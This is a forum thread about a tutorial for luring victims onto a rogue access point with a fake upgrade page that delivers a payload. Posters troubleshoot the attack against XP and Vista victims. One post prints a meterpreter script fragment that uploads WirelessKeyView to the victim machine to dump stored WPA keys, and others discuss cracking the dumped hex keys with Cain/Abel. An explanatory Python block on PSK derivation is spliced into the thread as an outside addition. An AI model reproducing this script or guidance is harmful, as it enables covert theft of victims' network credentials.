
I went back and tried your tutorial with an XP victim PC and it worked. I configured lighttpd on BT3 and everything appeared to be functional. However, once the victim runs the payload, isn't his connection supposed to forward through eth0? Victim is only receiving your upgrade page. Also, the payload isn't removed, it remains in the temporary internet files.

sorry but no,
nice tutorial, it's been a while since any good tuts went up.
anyway so I pwned myself and obtained ==================================================
Network Name (SSID): BigPond1967
Key Type : WPA-PSK
Key (Hex) : 3138383234393634323200
Key (Ascii) :
Adapter Name : D-Link AirPlus G DWL-G122 Wireless USB Adapter(rev.C)
Adapter Guid : {********-****-****-****-*************}
==================================================
now that's not my key, or it is my key but in hex, how do I crack the hex output or even calculate it to my key???

I don't think that will work, it doesn't generate a passphrase. You can use Cain/Abel in Windows and convert the hex to a passphrase, but is it really needed? It does take a while. Can you not enter the hex directly?

you should be able to enter the hex key directly in Ubuntu/BT4, I think I posted it in another thread. Just google "entering 64 character wpa key linux" or something similar

Thanks for the reply hm2075. I realize that I've been looking at two different scripts

However, there are still some problems that I'm having issues with. First off, this does not seem to work on Vista clients. I spent days trying to get it working, and finally ran it on XP and it worked no problem. Anyone have luck with Vista?

Second, I understand that you can enter the hex key into Ubuntu, but that is problematic in XP. I've tried your suggestion of using Cain, but the key does not appear to be long enough and crashes Cain. Ideas?

When you type a WPA-PSK key in Windows XP, the characters that you type are automatically converted into a new binary key that contains 32 bytes (64 hexadecimal digits). This binary key cannot instantly be converted back to the original key that you typed, but you can still use it for connecting to the wireless network exactly like the original key. In this case, WirelessKeyView displays this binary key in the Hex key column, but it doesn't display the original key that you typed.
As opposed to Windows XP, Windows Vista doesn't convert the WPA-PSK key that you type into a new binary key, but simply keeps the original key that you type. So under Windows Vista, the original WPA-PSK key that you typed is displayed in the Ascii key column.

so two things here: Vista shows the passphrase whereas XP shows the hex key. We learn two things here: Wireless Key Viewer works on XP and Vista, and we know the key formats too.

taken from grc

Each of the 64 hexadecimal characters encodes 4 bits of binary data, so the entire 64 characters is equivalent to 256 binary bits — which is the actual binary key length used by the WiFi WPA pre-shared key (PSK). Some WPA-PSK user interfaces (such as the one in Windows XP) allow the 256-bit WPA pre-shared key to be directly provided as 64 hexadecimal characters. This is a precise means for supplying the WPA keying material, but it is ONLY useful if ALL of the devices in a WPA-protected WiFi network allow the 256-bit keying material to be specified as raw hex. If any device did not support this mode of specification (and most do not) it would not be able to join the network.

this bit is interesting, is it saying some routers will not accept the key in hex format?

to try and convert the key back to a passphrase, open up Cain/Abel,
click on the cracker tab, right click on the right panel and press add to list, now enter the WPA key in hex, right click again on the ESSID and change it, finally right click and choose the crack method.

Now you will see if you try to brute force it then it will take about 1000 years for a key that is 8 chars, so the bottom line is there is no point trying to convert the hex into a passphrase, you might as well just try and crack the handshake in the first place.

so back to square one, we need a way to directly enter the WPA hex key, that's not a problem in Ubuntu so I'd say end of discussion.. LOL

# output of wireless key viewer -- what we want here is a random text file name to be generated when wkv is run, otherwise every victim will have the same txt file and you won't know the difference
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"

#upload wireless key viewer --- line 1 is just a comment, line 2 is waiting, line 3 is telling meterpreter to upload our "bin" (which is wkv) to the system drive on the victim, which is mostly c:, from the location of wkv.exe on the attack box, and then a comment
print_status("Uploading Wireless Key Viewer")
sleep(1)
client.fs.file.upload_file("%SystemDrive%\\#{bin}" , "/root/Desktop/WKV/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)
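To make the XP-versus-Vista difference concrete, here is an added example (not code from the thread, WKV or the meterpreter script): the derivation XP applies to a typed passphrase (PBKDF2-HMAC-SHA1 over the SSID, 4096 rounds, 256-bit output, per IEEE 802.11i), a length check telling a genuine 64-digit raw PSK apart from some other hex value a dump tool emits, and the wpa_supplicant stanza that takes the raw hex directly. The "password"/"IEEE" pair is the published 802.11i test vector; the 22-digit input is a constructed sample.

```python
import hashlib
import re

# WPA/WPA2-Personal PSK derivation as specified in IEEE 802.11i:
# PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
# This is what Windows XP stores after you type a passphrase, so the 64 hex
# digits WKV shows are the derived key, not an encoding of the passphrase,
# and there is no shortcut back from the hex to the passphrase.
def wpa_psk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)

# A dumped hex string is only a usable raw PSK if it is exactly 32 bytes.
# Anything shorter is some other value the tool emitted and will not be
# accepted as a 256-bit key (the "key does not appear to be long enough"
# symptom reported above).
def classify_hex_key(hex_key: str) -> str:
    h = hex_key.strip()
    if len(h) == 0 or len(h) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", h):
        return "not a hex string"
    nbytes = len(h) // 2
    if nbytes == 32:
        return "raw 256-bit PSK (64 hex digits)"
    return f"{nbytes}-byte value, not a 256-bit PSK"

# wpa_supplicant accepts the raw PSK directly: psk= followed by 64 unquoted
# hex digits, as opposed to psk="passphrase" in quotes.
def wpa_supplicant_block(ssid: str, psk: bytes) -> str:
    if len(psk) != 32:
        raise ValueError("raw PSK must be 32 bytes")
    return 'network={\n\tssid="%s"\n\tpsk=%s\n}\n' % (ssid, psk.hex())

if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    psk = wpa_psk_from_passphrase("password", "IEEE")
    print("PSK:", psk.hex())
    print(classify_hex_key(psk.hex()))
    print(classify_hex_key("00" * 11))  # constructed 22-digit dump, not a PSK
    print(wpa_supplicant_block("IEEE", psk), end="")
```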

Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the DHCP information from the attack box, but gets "page cannot be displayed" when browsing. I cannot ping the attack box IP or gateway, I get "Destination Unreachable".

As for the wireless key in hex, this is what gets dumped into the WKV folder: